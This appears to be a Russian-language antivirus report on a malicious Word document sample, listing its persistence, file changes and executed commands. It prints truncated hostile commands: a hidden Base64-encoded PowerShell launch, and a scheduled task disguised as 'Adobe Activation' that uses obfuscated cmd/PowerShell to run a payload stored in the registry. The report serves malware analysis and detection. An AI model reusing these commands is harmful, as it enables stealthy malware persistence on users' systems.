Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\adobe activation
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AG4AIAA9ACAAIgBBAGQAbwBiAGUAIABBAGMAdABpAHYAYQB0AGkAbwBuACIAOwANAAoAJAB0AHIAIAA9ACAAIgBDADoAXABXAEkAbgBkAE8AdwBzAFwAcwBZAFMAVABlAE0AMwAyAFwAYwBNAGQALgBlAHgARQAgAC8AYwAgAHAAXgBPAHcARQByAF...
Изменения в файловой системе
Создает следующие файлы
- <Текущая директория>\~wrd0000.tmp
Подменяет следующие файлы
- <PATH_SAMPLE>.doc
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AG4AIAA9ACAAIgBBAGQAbwBiAGUAIABBAGMAdABpAHYAYQB0AGkAbwBuACIAOwANAAoAJAB0AHIAIAA9ACAAIgBDADoAXABXAEkAbgBkAE8AdwBzAFwAcwBZAFMAVABlAE0AMwAyAFwAYwBNAGQALgBlAHgARQAgAC8AYwAgAHAAXgBPAHcARQByAF...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\schtasks.exe' /create /tn "Adobe Activation" /tr "<SYSTEM32>\cMd.exE /c p^OwEr^S^hE^l^l^.^exE -NonI -W hidden -c 'IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Micros...
